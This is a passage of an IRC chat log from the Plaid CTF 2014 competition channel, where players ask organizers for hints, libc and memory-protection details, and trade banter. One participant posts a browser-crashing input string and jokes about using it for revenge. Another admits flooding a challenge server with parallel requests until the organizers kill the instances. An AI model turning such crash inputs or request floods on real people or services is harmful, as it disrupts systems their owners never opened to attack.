  5150. (17:53:29) ••• qUit: (killobyte) ([email protected]) Quit: WeeChat 0.4.3
  5151. (17:53:34) ••• jOin: (Galactic) (~Galactic@unaffiliated/galactic)
  5152. (17:53:56) (crowell) who can I ping on wheeee?
  5153. (17:54:34) (+tylerni7) crowell: me or mserrano but he's not around
  5154. (17:54:44) (+tylerni7) heartbleed should be back on port 45373
  5155. (17:55:04) ••• jOin: (wahwah) ([email protected])
  5156. (17:55:23) ••• jOin: (pez) ([email protected])
  5157. (17:55:28) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  5158. (17:55:36) (crowell) tylerni7: ok, I was parsing something wrong, nvm
  5159. (17:55:40) (+tylerni7) k
  5160. (17:55:54) ••• jOin: (naam) ([email protected])
  5161. (17:56:58) ••• jOin: (_ariel_srariel) ([email protected])
  5162. (17:57:45) ••• jOin: (DeadheadTn) ([email protected])
  5163. (17:58:09) ••• qUit: (lollip) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
  5164. (17:58:21) (lkwpeter) who can i pm for doge stege ?
  5165. (17:58:26) (+tylerni7) lkwpeter: me
  5166. (17:58:39) (+tylerni7) win 114
  5167. (17:58:41) (+tylerni7) ugh
  5168. (17:59:07) ••• jOin: (isra17) ([email protected])
  5169. (17:59:39) (pipecork) that's a lot of windows
  5170. (17:59:43) (shortkidd) inb4 he just gave us an answer
  5171. (17:59:55) (+tylerni7) pipecork: yes, -_-
  5172. (18:00:13) (Adran) doge 114
  5173. (18:01:28) ••• jOin: (sewilton) ([email protected])
  5174. (18:01:40) (namrog84) much messages
  5175. (18:04:40) ••• jOin: ([2]Knight) ([email protected])
  5176. (18:04:59) ••• qUit: (wahwah) ([email protected]) Quit: WeeChat 0.3.8
  5177. (18:05:10) ••• jOin: (PoopyPantsSr) ([email protected])
  5178. (18:05:26) (PoopyPantsSr) halphow2js is good at crashing my browser
  5179. (18:05:32) (+tylerni7) :P
  5180. (18:05:52) (isra17) is it possible get libc binary used for the exploit?
  5181. (18:06:19) (+tylerni7) isra17: sorry, no
  5182. (18:06:31) (+tylerni7) it's doable without (and people have been solving it without)
  5183. (18:06:35) ••• qUit: (xire_) ([email protected]) Ping timeout: 240 seconds
  5184. (18:06:36) ••• qUit: (mouth`) ([email protected]) Quit: Leaving.
  5185. (18:06:41) (+tylerni7) we don't plan to change that
  5186. (18:06:59) ••• qUit: ([1]Knight) ([email protected]) Ping timeout: 240 seconds
  5187. (18:07:47) ••• qUit: (rvpersie_) ([email protected]) Remote host closed the connection
  5188. (18:09:05) ••• qUit: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
  5189. (18:09:28) ••• qUit: (dct1) ([email protected]) Quit: dct1
  5190. (18:09:46) ••• qUit: (s3Ri0us) ([email protected])
  5191. (18:09:56) ••• jOin: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41)
  5192. (18:09:56) ••• mOde: (ChanServ) sets (+v fixception)
  5193. (18:10:25) (+tylerni7) yay another rsa solve :)
  5194. (18:10:52) (eastwolf_) can I ask a question about rendezvous in pm?
  5195. (18:10:53) ••• pArt: (kushou) ([email protected]) "WeeChat 0.4.3"
  5196. (18:11:14) (+tylerni7) eastwolf_: poke houqp
  5197. (18:11:14) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  5198. (18:11:36) (Zoro) How do I view the hint for tiffany?
  5199. (18:11:46) (+tylerni7) Zoro: you don't
  5200. (18:11:54) (+awesie) there should a hints link at the top of the page
  5201. (18:11:56) (+tylerni7) unless maybe chance thing comes up and decides to give a hint
  5202. (18:11:56) (Zoro) why is it there?
  5203. (18:11:56) (+tylerni7) oh
  5204. (18:12:10) ••• jOin: (rvpersie) ([email protected])
  5205. (18:13:36) (+mserrano) crowell: if you still need wheee questions answered I am here
  5206. (18:13:37) (Zoro) wow. that's a great hint. It's about as helpful as hydrofluorosilicic acid.
  5207. (18:13:41) ••• qUit: (_ariel_srariel) ([email protected]) Ping timeout: 276 seconds
  5208. (18:13:44) (+mserrano) In fact, if anyone needs whee answers they can ask
  5209. (18:13:44) (Zoro) it's about as helpful as a flea.
  5210. (18:13:52) (+tylerni7) answers?
  5211. (18:13:56) (+tylerni7) :P
  5212. (18:14:03) (Zoro) May I have the answers?
  5213. (18:14:25) (alexwebr) mserrano: What is the vulnerability?
  5214. (18:14:31) (alexwebr) mserrano: op plz respond
  5215. (18:14:32) (+mserrano) er
  5216. (18:14:37) (+mserrano) answers to reasonable questions :P
  5217. (18:14:41) ••• qUit: (cybercybercyber) ([email protected]) Quit: cybercybercyber
  5218. (18:14:44) (Adran) how do I computer?
  5219. (18:14:55) ••• qUit: (dvddaver) ([email protected]) Quit: dvddaver
  5220. (18:15:00) (+mserrano) alexwebr: there is a bug in the crypto.
  5221. (18:15:12) (+mserrano) Hope that helps!
  5222. (18:15:17) (alexwebr) mserrano: :P
  5223. (18:16:06) (asmoday) oh shit we have gone np
  5224. (18:16:08) (+mserrano) Dear person who submitted his email as a flag:
  5225. (18:16:14) (+mserrano) I don't think your email is a flag.
  5226. (18:16:31) (Adran) spam flag
  5227. (18:16:35) (asmoday) next we are going to solve p vs np
  5228. (18:16:50) ([NULLify]Chaplin) Is WhatsCat sending password reset emails?
  5229. (18:16:55) (asmoday) then world peace
  5230. (18:17:04) ([CISSP]HoLyVieR) did anyone dare to submit the javascript flag yet ?
  5231. (18:17:05) (Adran) [NULLify]Chaplin: it was
  5232. (18:17:06) (rray) [NULLify]Chaplin: yes
  5233. (18:17:10) ([NULLify]Chaplin) 'Cause I'm not getting one at my 10 minute mail address
  5234. (18:17:20) ••• jOin: (_ariel_srariel) ([email protected])
  5235. (18:17:25) (Kasalehlia) asmoday: dont forget the higgs and neutrino stuff
  5236. (18:17:27) (rray) refresh your 10 minute email address
  5237. (18:17:29) ••• qUit: (DuhJangOh) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  5238. (18:17:35) ••• qUit: (trelgak) ([email protected]) Ping timeout: 276 seconds
  5239. (18:17:53) ([NULLify]Chaplin) rray: I have been.
  5240. (18:18:03) (+tylerni7) [NULLify]Chaplin: it should work
  5241. (18:18:09) (+tylerni7) might be slow/sent to spam
  5242. (18:18:30) ([NULLify]Chaplin) tylerni7: k, I'll give it some more time, maybe try another inbox
  5243. (18:18:30) ••• jOin: (BinaryCrystal) ([email protected])
  5244. (18:19:33) ••• jOin: (ronbarrey) ([email protected])
  5245. (18:19:45) ([NULLify]Chaplin) 10MM didn't work, Mailinator did. Thanks anyways guys
  5246. (18:20:12) (+tylerni7) cool
  5247. (18:20:13) (ronbarrey) how can multiplication be hard?
  5248. (18:20:25) ••• nIck: (Xor0X_pwn100) is now known as (Xor0X)
  5249. (18:20:31) ••• qUit: (sqall) ([email protected]) Quit: Leaving.
  5250. (18:20:55) ••• qUit: (Stean) ([email protected]) Quit: Leaving.
  5251. (18:20:55) ••• jOin: (rliu) (ad3d971b@gateway/web/freenode/ip.173.61.151.27)
  5252. (18:20:56) ••• qUit: (Guest24706) ([email protected]) Read error: Connection reset by peer
  5253. (18:21:17) (ktrask) ronbarrey: sometimes the result is not as expected
  5254. (18:21:22) (kmowery) is the wheeeee server wedged
  5255. (18:21:35) (kmowery) wait, no, it's responding to Some of my requests
  5256. (18:21:51) (+mserrano) kmowery: looks fine to me
  5257. (18:23:12) ••• jOin: (paul66) ([email protected])
  5258. (18:23:23) ••• qUit: (sadcat) ([email protected]) Remote host closed the connection
  5259. (18:23:48) (namrog84) arghh, i know what i need to do to get a flag, but i dont know how i do what i need to do. its the worst!
  5260. (18:24:03) (+tylerni7) :(
  5261. (18:24:36) (ronbarrey) why is the multiplication so hard...
  5262. (18:24:37) (paul66) 1700
  5263. (18:24:44) ••• qUit: (mah_one) ([email protected]) Ping timeout: 252 seconds
  5264. (18:24:48) (mongo12) dont try to get the flag, thats impossible; try to realize the truth, there is no flag
  5265. (18:25:33) (mongo12) oh wait, we're doing hackers references, not matrix
  5266. (18:25:35) (Anyny0) The flag is cake.
  5267. (18:25:38) (Anyny0) The cake is a lie
  5268. (18:25:40) (+mserrano) The flag is a lie.
  5269. (18:25:45) ([NULLify]Chaplin) Haha, we're watching Matrix here
  5270. (18:25:55) (x_x) So there are no flags and we're all winners?
  5271. (18:26:20) (wyatt_earp) ^^^ what kind of "everyone's special" crap is that
  5272. (18:26:30) ••• qUit: (p45741) ([email protected]) Ping timeout: 258 seconds
  5273. (18:26:47) ••• jOin: (nectoo) ([email protected])
  5274. (18:27:01) ••• qUit: (nectoo) ([email protected]) Client Quit
  5275. (18:27:58) ••• jOin: (snoopybbt) ([email protected])
  5276. (18:28:35) ••• jOin: (naam) ([email protected])
  5277. (18:29:00) (WhizzMan) Kaiser Sose ate my flag
  5278. (18:30:47) ••• qUit: (sqrts|stephan1) ([email protected]) Ping timeout: 252 seconds
  5279. (18:31:00) (asmoday) I am stealing this browser crashing js and using it as revenge on my enemies
  5280. (18:31:21) (Adran) asmoday: it crashed your browser?
  5281. (18:31:57) (asmoday) no offense but as the script says...you must not know js
  5282. (18:32:52) ••• jOin: (SaWsi3gE) ([email protected])
  5283. (18:34:56) ••• jOin: (bglAEB) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101)
  5284. (18:35:07) (bglAEB) is the flag to multiplication is hard in decimal?
  5285. (18:35:23) (asmoday) no
  5286. (18:35:23) (+mserrano) once you know what the flag is
  5287. (18:35:26) (+mserrano) it is obviously the flag
  5288. (18:35:57) (bglAEB) i thought i did know :(
  5289. (18:36:01) (asmoday) put XXXXXXXXXXXXXXXXXXXXXXYYYYYYYYYYYYYXXXXXXXXXXXXXXXXXXXXXX in the #1 on the js test for a good time
  5290. (18:36:02) (asmoday) hahahah
  5291. (18:37:04) ••• jOin: (krycek) ([email protected])
  5292. (18:37:05) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  5293. (18:37:30) ••• jOin: (erketu) ([email protected])
  5294. (18:38:46) ••• jOin: (dct1) ([email protected])
  5295. (18:39:11) ••• qUit: (krycek) ([email protected]) Client Quit
  5296. (18:40:58) (tomcr00se) libc for the pokemon one?
  5297. (18:41:03) ••• qUit: (ggis) ([email protected]) Ping timeout: 245 seconds
  5298. (18:41:07) (+mserrano) tomcr00se: you don't need it
  5299. (18:41:09) ••• jOin: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105)
  5300. (18:41:25) (tomcr00se) ugh
  5301. (18:41:50) (+tylerni7) :P
  5302. (18:41:51) (tomcr00se) but i'm so lazy
  5303. (18:41:51) (+tylerni7) n00b
  5304. (18:41:52) (LMolr) hint crypto 200
  5305. (18:41:54) (LMolr) plox
  5306. (18:42:02) (LMolr) hint crypto 20
  5307. (18:43:02) ••• qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  5308. (18:43:40) ••• jOin: (sqrts|stephan) ([email protected])
  5309. (18:43:46) ••• jOin: (okik) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
  5310. (18:43:58) (okik) Any hints for nightmares?
  5311. (18:44:15) (okik) plzplz
  5312. (18:44:26) (+mserrano) there's some python shit
  5313. (18:44:30) (+mserrano) and it will haunt your nightmares
  5314. (18:44:48) (crowell) writin' ruby jail next year
  5315. (18:44:54) (+mserrano) lol
  5316. (18:45:05) (crowell) fuck yo python
  5317. (18:45:09) (iago-x86) Not sure if you can say, but is the heap executable on kappa?
  5318. (18:45:10) (okik) doesn't pyjail approach work?
  5319. (18:45:14) (+mserrano) iago-x86: it is not
  5320. (18:45:18) (iago-x86) damnit
  5321. (18:45:24) (iago-x86) I didn't think so, but wanted to confirm
  5322. (18:45:27) (+mserrano) okik: why not try it?
  5323. (18:45:47) (+mserrano) iago-x86: you can always run checksec.sh, btw
  5324. (18:46:12) (+mserrano) http://www.trapkit.de/tools/checksec.html
  5325. (18:46:19) (iago-x86) mserrano: Nice, I didn't know about that!
  5326. (18:46:28) (iago-x86) Sadly, on my box it runs on the heap
  5327. (18:46:32) (iago-x86) Guess it's not enforcing that
  5328. (18:46:38) (iago-x86) Ohwell, EIP control anyway. :D
  5329. (18:46:39) (+mserrano) huh. weird.
  5330. (18:46:44) (+mserrano) :)
  5331. (18:47:12) ••• jOin: (Stean) ([email protected])
  5332. (18:47:13) (+mserrano) I think aslr is on too
  5333. (18:47:19) ••• jOin: (vap0r) (d06bcefc@gateway/web/freenode/ip.208.107.206.252)
  5334. (18:47:25) • supersat stab stab stab
  5335. (18:47:39) (+mserrano) also, everyone should vote 5
  5336. (18:48:00) (crowell) which one gets frozencemetery problem?
  5337. (18:48:49) ••• jOin: (Hertz__) ([email protected])
  5338. (18:49:29) (+clockish) crowell: misc 250 I think
  5339. (18:49:35) ••• qUit: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35) Ping timeout: 240 seconds
  5340. (18:49:48) ••• nIck: (nullProtectorate) is now known as (chrissing)
  5341. (18:50:11) (+clockish) ...amd it's gone :P
  5342. (18:50:29) ••• jOin: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
  5343. (18:50:37) (tomcr00se) omg tyler wheres your libc finder
  5344. (18:50:40) (+clockish) (it needs to be tested by frozen before it can go live)
  5345. (18:50:54) ••• jOin: (irctc268) (329c7efb@gateway/web/freenode/ip.50.156.126.251)
  5346. (18:50:58) (+clockish) tomcr00se: hack by hand
  5347. (18:51:03) (+clockish) be more 1337
  5348. (18:51:24) (irctc268) Can someone give hint for g++ reversing 200?
  5349. (18:51:32) (+clockish) tomcr00se: also is halphow2js slightly broken or something, how are you the only solver?
  5350. (18:51:48) ••• qUit: (nopple) ([email protected]) Remote host closed the connection
  5351. (18:51:50) (inter) cuz everyone is doing something else?
  5352. (18:51:57) (+clockish) irctc268: strategy: 1. simplify 2. analyze 3. get flag.
  5353. (18:52:19) (+clockish) inter: Everyone? there are a lot of you guys...
  5354. (18:53:02) ••• qUit: (s_kunk) ([email protected]) Ping timeout: 250 seconds
  5355. (18:53:24) (tomcr00se) wtf wtf ezhp has differnt libc?
  5356. (18:53:33) ••• jOin: (naam) ([email protected])
  5357. (18:53:48) ••• qUit: (okik) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
  5358. (18:54:00) (+clockish) it's all AWS debain, except for the AWS ubuntus and AWS fedoras.
  5359. (18:54:01) (Luffy) i have an announcement to make....
  5360. (18:54:29) • tomcr00se is not amused
  5361. (18:55:05) (_blasty_) clockish: lol
  5362. (18:55:37) (kmowery) did other people need multiple machines to solve wheee, or am i missing something important
  5363. (18:55:46) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  5364. (18:56:03) (tomcr00se) kmowery: i got 2**24 machines to do it
  5365. (18:56:08) (tomcr00se) was fast
  5366. (18:56:11) (+mserrano) kmowery: It takes one machine.
  5367. (18:57:04) (kmowery) hmmm okay, back to math. thanks!
  5368. (18:58:18) * Disconnected
  5369. Session Close: Sat Apr 12 18:58:19 2014
  5370. Session Start: Sat Apr 12 18:58:19 2014
  5371. Session Ident: #pctf
  5372. (18:58:27) ••• rAw (0) LS account-notify extended-join identify-msg multi-prefix sasl
  5373. (18:58:27) ••• nIckname in use: (x_x)
  5374. (18:58:27) ••• iNfo: Press Control+F1 to retry taking the nick (x_x)!
  5375. (18:58:27) ••• rAw (0) ACK multi-prefix
  5376. (18:58:27) ••• rAw (432) -_- Erroneous Nickname
  5377. (18:59:08) * Attempting to rejoin channel #pctf
  5378. (18:59:12) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  5379. (18:59:12) ••• jOined: (#pctf)
  5380. (18:59:12) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  5381. (18:59:12) ••• tOpic: ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card))
  5382. (18:59:12) ••• sEt by: (cai_!~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) on (Saturday, April 12th 2014, 16:41:38)
  5383. (18:59:12) ••• uSers: 407 users, 1 ops (0%), 12 voiced (3%), 394 regulars (97%)
  5384. (18:59:12) ••• sYnc time: (0.61) second(s)
  5385. (18:59:12) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  5386. (18:59:12) -asimov.freenode.net@#pctf- [freenode-info] channel trolls and no channel staff around to help? please check with freenode support: http://freenode.net/faq.shtml#gettinghelp
  5387. (18:59:17) (Yerer) Wow looking at the flashing colors one made me feel a little nauseous haha
  5388. (18:59:26) (haoz) can i have any direction for stege
  5389. (18:59:31) (Luffy) think how me, a colorblind person, feels
  5390. (18:59:32) (|x_x|) Yeah, it's an epillepsy warning.
  5391. (18:59:35) (haoz) *stege_doge
  5392. (18:59:35) (+tylerni7) Yerer: disable javascript I guess
  5393. (18:59:38) (|x_x|) Nearly put me out looking at the page.
  5394. (18:59:47) (+tylerni7) I /did/ slow it down a bit
  5395. (18:59:52) (Yerer) Haha no it's okay I got it turned off
  5396. (18:59:57) (+tylerni7) :P
  5397. (19:00:09) (|x_x|) I didn't see the warning at first and it almost floored me.
  5398. (19:00:11) (ronbarrey) any hints for the crypto20
  5399. (19:00:13) (deject3d) tomcr00se would you adopt me
  5400. (19:00:15) • |x_x| knows you guys were trying to kill him.
  5401. (19:00:50) (supersat) wtf, no hex numbers in json?
  5402. (19:00:54) (corpille) thanks for mtpox hint ....
  5403. (19:00:54) (+mserrano) |x_x|: :(
  5404. (19:00:55) (+mserrano) sorry
  5405. (19:00:59) (tomcr00se) deject3d: do you know which libc is on the pokemon machine?
  5406. (19:01:16) (+mserrano) lol all our hints are from ages ago
  5407. (19:01:19) (+mserrano) maybe we should put in new hints
  5408. (19:01:24) (_blasty_) no
  5409. (19:01:24) ••• qUit: (userk) ([email protected]) Quit: Leaving
  5410. (19:01:26) (_blasty_) fuck hints
  5411. (19:01:31) (deject3d) 2.18
  5412. (19:01:32) (|x_x|) It's alright, mserrano. Could have been much worse had I been alone at the time.
  5413. (19:01:32) (_blasty_) esp for tasks that have been solved
  5414. (19:01:50) (_blasty_) also fuck breakthrough pts
  5415. (19:01:51) (Zoro) Home Alone
  5416. (19:02:00) (_blasty_) its BS, and everyone knows it :P
  5417. (19:02:07) ([NULLify]Chaplin) Is there a special admin account for WhatsCat?
  5418. (19:02:25) (Zoro) What does "Chronosphere discharge in 3 minutes" mean?
  5419. (19:02:27) (Zoro) New hint?
  5420. (19:02:34) ••• qUit: (x_x) ([email protected]) Ping timeout: 264 seconds
  5421. (19:02:41) (deject3d) it means pucker your butthole ChanServ
  5422. (19:02:45) (+mserrano) Zoro: new problem
  5423. (19:02:50) ([NULLify]Chaplin) deject3d: lulz
  5424. (19:02:54) (+mserrano) we may release an additional new problem soon (tm)
  5425. (19:02:56) (deject3d) cha<tab>
  5426. (19:02:56) (+mserrano) but no promises
  5427. (19:02:59) ••• jOin: (mapleray) ([email protected])
  5428. (19:03:15) (asmoday) too bad those hints should be damn obvious or your out of your element
  5429. (19:03:15) (bglAEB) how do we see the hint for mtpox
  5430. (19:03:19) ••• jOin: (jmgrosen) ([email protected])
  5431. (19:03:19) ••• qUit: (deject3d) ([email protected]) Quit: Computer has gone to sleep.
  5432. (19:03:22) (+clockish) [NULLify]Chaplin]: tylerni7 or I can whatscat
  5433. (19:03:22) (asmoday) click hints
  5434. (19:03:23) (Luffy) release the cracken!
  5435. (19:03:24) (jduck) lol "new hint for mtpox"
  5436. (19:03:28) (+clockish) bglAEB: on the hints page
  5437. (19:03:33) (+mserrano) jduck: it randomly picked a hint from the db
  5438. (19:03:34) (Luffy) wait
  5439. (19:03:37) (Luffy) wheres the hints page
  5440. (19:03:41) (+mserrano) when we saw it was that one we were like "well, that's unfortunate"
  5441. (19:03:44) (Luffy) oh nvm
  5442. (19:03:45) (Zoro) Luffy: Up at the top
  5443. (19:03:56) (jduck) wel i guess it makes sense as long as there is at least one team that hasn't solved =)
  5444. (19:04:27) (Luffy) omg
  5445. (19:04:30) (Luffy) that hint for mtpox
  5446. (19:04:30) (Zoro) I would rather accept a hint of spice than these hints
  5447. (19:04:35) (Luffy) i already got that far with it
  5448. (19:04:36) (Luffy) lol
  5449. (19:05:55) (|x_x|) he who controls the spice controls the universe!
  5450. (19:06:03) (+mserrano) hm wtf website bug
  5451. (19:06:05) • +mserrano tries to fix
  5452. (19:06:06) (vap0r) ...that's supposed to be a hint? :P
  5453. (19:06:15) (chrissing) wait does pwn150 open up?
  5454. (19:06:22) (_blasty_) pwn150
  5455. (19:06:25) (_blasty_) no click
  5456. (19:06:30) (_blasty_) is this scoreboard challenge ?
  5457. (19:06:45) (bglAEB) what's up with multiplication is hard
  5458. (19:06:47) (_blasty_) first team to make json req for chall info gets a headstart
  5459. (19:06:51) (bglAEB) that's the one that needs a god damned hint
  5460. (19:06:52) (asmoday) whats the string for tiffany
  5461. (19:07:01) (+mserrano) harry_potter open
  5462. (19:07:04) (_blasty_) ah now it works
  5463. (19:07:09) (+mserrano) sorry
  5464. (19:07:11) (+mserrano) was glitchy
  5465. (19:07:20) (+mserrano) it opened a problem we deleted (because it broke and we do not have time to fix it)
  5466. (19:07:26) (+mserrano) but displayed this problem as being opene
  5467. (19:07:27) (+mserrano) open*
  5468. (19:07:45) (Redford) mserrano: WHEEE is lagging :( is was muuuch faster an hour ago
  5469. (19:07:46) ••• qUit: (_ariel_srariel) ([email protected]) Quit: leaving
  5470. (19:07:49) ••• jOin: (s_kunk) ([email protected])
  5471. (19:07:54) ••• qUit: (Yerer) ([email protected]) Ping timeout: 258 seconds
  5472. (19:08:05) (+mserrano) Redford: hm let me poke it
  5473. (19:08:18) (Ymgve) wtf is up with the markup on harry_potter
  5474. (19:08:37) (Redford) I have to wait a couple of minutes for each encryption
  5475. (19:08:42) (+mserrano) Redford: oh god someone is nuking it
  5476. (19:08:43) (+mserrano) wtf people
  5477. (19:08:59) (Redford) :/
  5478. (19:09:11) (+mserrano) someone made like
  5479. (19:09:15) (+mserrano) 400 parallel requests to it
  5480. (19:09:18) (Redford) omg
  5481. (19:09:20) (Redford) :O
  5482. (19:09:21) (+mserrano) like that will not do what you want
  5483. (19:09:22) (+mserrano) lol
  5484. (19:09:23) ••• jOin: (oej) ([email protected])
  5485. (19:09:24) ••• nIck: (oej) is now known as (_joeje_)
  5486. (19:09:31) ••• qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Quit: leaving
  5487. (19:09:36) ••• jOin: (Sin__) ([email protected])
  5488. (19:09:38) • +mserrano about to killall
  5489. (19:09:45) (+mserrano) ... once killall finishes installing
  5490. (19:09:49) (+mserrano) the cpu got wrecked
  5491. (19:10:39) (+mserrano) Redford: check now
  5492. (19:10:49) (+mserrano) I killed like ~4000 instances
  5493. (19:10:53) (Redford) wow
  5494. (19:10:53) ••• jOin: (nopple) ([email protected])
  5495. (19:10:55) (Redford) thx!
  5496. (19:10:57) (namrog84) dogeeee
  5497. (19:11:05) (+mserrano) I guess someone pointed like a botnet at it or something
  5498. (19:11:05) (+mserrano) lol
  5499. (19:11:32) ••• qUit: (paul66) ([email protected]) Read error: Connection reset by peer
  5500. (19:11:59) ••• jOin: (paul66) ([email protected])
  5501. (19:12:29) (kmowery) that might have been me
  5502. (19:12:52) (+mserrano) kmowery: ... please don't do that
  5503. (19:12:52) ••• jOin: (vesh) ([email protected])
  5504. (19:12:55) (+mserrano) you really don't have to to solve it
  5505. (19:13:05) ••• jOin: (naam) ([email protected])
  5506. (19:13:41) (kmowery) i'm fairly sure i have a solution for it, but i need something like 2^13 blocks enciphered
  5507. (19:13:49) ••• qUit: (bglAEB) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  5508. (19:13:54) (kmowery) frustrating, but i'll go look for another solution
  5509. (19:13:59) (+mserrano) You can do that sequentially instead of making many many requests in parallel, if you must
  5510. (19:14:05) ••• qUit: (lstamour_) (18699342@gateway/web/freenode/ip.24.105.147.66) Ping timeout: 240 seconds
  5511. (19:14:06) (Luffy) thought id let you all in on this
  5512. (19:14:09) (+mserrano) 2^13 is only what, like 8000?
  5513. (19:14:10) (Luffy) "mtpox.com is a Bitcoin Phishing Site being advertised on Google Adsense"
  5514. (19:14:15) (+mserrano) LOL
  5515. (19:14:18) (Redford) mserrano: still slow, but it's better now
  5516. (19:14:24) (kmowery) mserrano: it's far too slow; things change before my proof of work works fast enough
  5517. (19:14:37) ••• jOin: (trelgak) ([email protected])
  5518. (19:14:45) (+mserrano) kmowery: that suggests that maybe there's a better solution
  5519. (19:14:47) (+mserrano) Redford: hm
  5520. (19:14:50) ••• qUit: (nateloaf) ([email protected]) Quit: Leaving.
  5521. (19:14:50) ••• jOin: (roolky) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
  5522. (19:14:54) (+clockish) kmowery: or that you need to work faster :P
  5523. (19:15:13) (Redford) mserrano: still about 5 times slower than previously
  5524. (19:15:23) (Redford) but I can deal with it
  5525. (19:15:25) (Redford) it works now
  5526. (19:15:31) (roolky) any hint for webcats?
  5527. (19:15:48) (namrog84) the dogestege, will it be apparent/obvious to me when i solved it correctly? cause i feel like itll be subtle/easy to miss
  5528. (19:15:59) (+clockish) namrog84: it will be obvious
  5529. (19:16:10) (|x_x|) namrog84, so very obvious.
  5530. (19:16:19) (+mserrano) Redford: yeah... it's incredibly heavily cpu-bound
  5531. (19:16:35) (+mserrano) Redford: so if more than one person asks at a time it may be slower
  5532. (19:16:43) (+mserrano) maybe I can increase the time between key cycles
  5533. (19:16:43) (phiber_) they key on wheeee changes too fast
  5534. (19:16:57) (phiber_) I can't get enough plaintexts before it changes
  5535. (19:17:04) ••• jOin: (erketu1) ([email protected])
  5536. (19:17:27) (Adran) very obvious
  5537. (19:17:28) (Adran) mcuh wow
  5538. (19:17:47) (Redford) mserrano: maybe you could run it using pypy instead of python? it will give you a big speed-up ;)
  5539. (19:18:00) (+mserrano) Redford: sadly it won't
  5540. (19:18:02) (+tylerni7) Redford: it uses C for the hard parts
  5541. (19:18:05) (asmoday) members of more smoked leet chicken, any members of your team goes to defcon look for DC814/DC407 group I Asmoday will buy a beer хорошо
  5542. (19:18:07) (+mserrano) it runs in C for the cpu-bound part, yeah
  5543. (19:18:21) (inter) honestly
  5544. (19:18:25) (Luffy) namrog84: it's obvious to those who have solved it :)
  5545. (19:18:31) (inter) why would you guys put 38.55 * 1700
  5546. (19:18:37) (inter) the trolling is real
  5547. (19:18:43) (+mserrano) inter: because multiplication is hard.
  5548. (19:18:49) (asmoday) haha that was a great challenge
  5549. (19:18:51) (Luffy) inter: ya inter
  5550. (19:19:04) (inter) why not 65535
  5551. (19:19:06) (asmoday) the person that made that challenge must have hated life for a time
  5552. (19:19:08) (inter) and mess their brain up
  5553. (19:19:19) (Redford) mserrano: server down
  5554. (19:19:20) (asmoday) I know I did
  5555. (19:19:23) ••• qUit: (erketu) ([email protected]) Ping timeout: 245 seconds
  5556. (19:19:23) (+mserrano) Redford / phiber_: restarting it
  5557. (19:19:29) (Redford) ok
  5558. (19:19:30) (namrog84) Luffy, thanks. fairly new to forenseics, so poking around a bunch of stuff trying to figure it out, wasnt sure if it would be subtle or not
  5559. (19:19:31) (+mserrano) Redford / phiber_: increasing time between cycles
  5560. (19:19:40) (phiber_) thank you
  5561. (19:19:42) (Redford) thx!
  5562. (19:20:15) ••• jOin: (Yerer) ([email protected])
  5563. (19:20:15) ••• jOin: (p4574) ([email protected])
  5564. (19:20:28) (+clockish) namrog84: forensics problems often suck. Not that this one doesn't, but there's a reasonably simple thing you can do to produce a very obvious flag :P
  5565. (19:20:40) (Zoro) not really
  5566. (19:20:42) ••• qUit: (p4574) ([email protected]) Client Quit
  5567. (19:20:46) (asmoday) what is the tiffany string
  5568. (19:20:57) (Luffy) namrog84: don't listen to clockish forensics are the best
  5569. (19:21:12) (+mserrano) Redford / phiber_: back up
  5570. (19:21:14) (+clockish) I HATE FORENSICS
  5571. (19:21:21) (Luffy) FORENSICS HATE YOU
  5572. (19:21:27) (+clockish) I KNOWWWWW
  5573. (19:21:30) (+mserrano) you shouldn't need too many ciphertexts, but yeah, blanked on the fact that more people at a time nuked the cpu
  5574. (19:21:32) (Luffy) :)
  5575. (19:22:02) ••• jOin: (cybercybercyber) ([email protected])
  5576. (19:22:05) (phiber_) thanks, let's see how it goes now
  5577. (19:22:35) ••• qUit: (irctc268) (329c7efb@gateway/web/freenode/ip.50.156.126.251) Ping timeout: 240 seconds
  5578. (19:24:14) ••• nIck: (Guest76035) is now known as (the_doctor)
  5579. (19:24:32) ••• qUit: (TMT) ([email protected])
  5580. (19:24:44) ••• nIck: (the_doctor) is now known as (Guest10433)
  5581. (19:25:14) ••• qUit: (albntomat0) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Quit: Page closed
  5582. (19:25:28) ••• nIck: (Guest10433) is now known as (thedoctordmc)
  5583. (19:26:13) ••• jOin: (poppopret) ([email protected])
  5584. (19:26:29) ••• qUit: (nonroot) ([email protected]) Ping timeout: 276 seconds
  5585. (19:28:50) ••• qUit: (fritz[]) ([email protected])
  5586. (19:31:15) (+mserrano) Gj Stratum Auhuur!
  5587. (19:31:18) ••• qUit: (roolky) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Quit: Page closed
  5588. (19:31:20) (+mserrano) gcc solved
  5589. (19:31:20) (tsuro) mserrano: thanks :)
  5590. (19:31:45) (+tylerni7) nice job guys :)
